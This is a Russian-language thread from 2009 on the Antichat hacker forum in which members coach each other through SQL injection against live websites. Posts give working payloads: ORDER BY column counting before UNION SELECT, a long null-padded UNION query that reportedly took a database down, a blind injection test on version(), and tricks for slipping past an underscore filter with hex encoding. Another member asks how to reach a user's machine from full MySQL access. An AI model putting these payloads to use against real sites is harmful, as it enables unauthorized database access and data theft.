Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.08.2009, 14:13
|
|
Новичок
Регистрация: 13.08.2009
Сообщений: 10
Провел на форуме:
179283
Репутация:
10
|
|
bleeep, полей может быть хоть 150, используй order+by
|
|
|
26.08.2009, 14:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от bleeep
Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((
Зачем сразу union+select делать? вначале узнаю сколько колонок- order+by+x--
где x то кол-во при котором у тебя не выдает ошибку, то есть при 61 есть ошибка а при 60 нету , значит у тебя 60 колонок и => union+select+1,2,...,59,60--
|
|
|
|
26.08.2009, 15:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от bleeep
Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((
добиться вывода не удалось . закончил вот на этом
Код:
?id=34316+union+select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from ff_for,ff_users, ff_status where 1=1 OR 1=1
mysql gone down )))
крутить можно как слепую.
Код:
?id=34316+and+substring(version(),1,1)=5
з.ы. сиськи с сайта сильно мешают думать.
|
|
|
|
26.08.2009, 17:03
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Привет всем
Как обойти ....
При запросе
union+select+user_name+from+user/* order+by+abc
фильтруется _ и запрос выглядит как
union+select+user+order+by+abc
так же происходит при LOAD_FILE
в общем в любом месте _ переводится в пробел и все что следом отбрасывается
CHAR, %5F, все не помогает
Какие есть соображения?
PS ' - экранируется
Последний раз редактировалось jangle; 26.08.2009 в 17:06..
|
|
|
|
26.08.2009, 17:25
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Сообщение от jangle
Привет всем
Как обойти ....
При запросе
union+select+user_name+from+user/* order+by+abc
фильтруется _ и запрос выглядит как
union+select+user+order+by+abc
так же происходит при LOAD_FILE
в общем в любом месте _ переводится в пробел и все что следом отбрасывается
CHAR, %5F, все не помогает
Какие есть соображения?
PS ' - экранируется
unhex(hex(user_name)) ?
aes_decrypt(aes_encrypt(user_name)) ?
Последний раз редактировалось ph1l1ster; 26.08.2009 в 17:28..
|
|
|
|
26.08.2009, 17:31
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
unhex(hex(user_name)) ?
ase_decrypt(aes_encrypte(user_name)) ?
ase_decrypt - недопустимо тк _ вырежется
unhex(hex(user_name)) - тоже не допустимо _ присутствует
unhex(757365725F6E616D65) - 1054 - Unknown column '757365725F6E616D65' in 'field list'
колонка user_name - 100% есть
Последний раз редактировалось jangle; 26.08.2009 в 17:39..
|
|
|
|
26.08.2009, 19:26
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от ph1l1ster
unhex(hex(user_name)) ?
aes_decrypt(aes_encrypt(user_name)) ?
Каким образом это поможет то?
|
|
|
|
26.08.2009, 19:32
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сорри что ещё раз повотряю вопрс.
Как можно залезть на машину юзера если у меня есть полный доступ к MySQL?
|
|
|
|
26.08.2009, 19:42
|
|
Новичок
Регистрация: 01.02.2009
Сообщений: 5
Провел на форуме:
41189
Репутация:
0
|
|
Сообщение от HAXTA4OK
Зачем сразу union+select делать? вначале узнаю сколько колонок- order+by+x--
где x то кол-во при котором у тебя не выдает ошибку, то есть при 61 есть ошибка а при 60 нету , значит у тебя 60 колонок и => union+select+1,2,...,59,60--
А есть какя нибудь программка чтобы вручную не перебирать числа?)
|
|
|
|
26.08.2009, 19:48
|
|
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716
Репутация:
145
|
|
Сообщение от bleeep
А есть какя нибудь программка чтобы вручную не перебирать числа?)
куча.
вот тут например
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
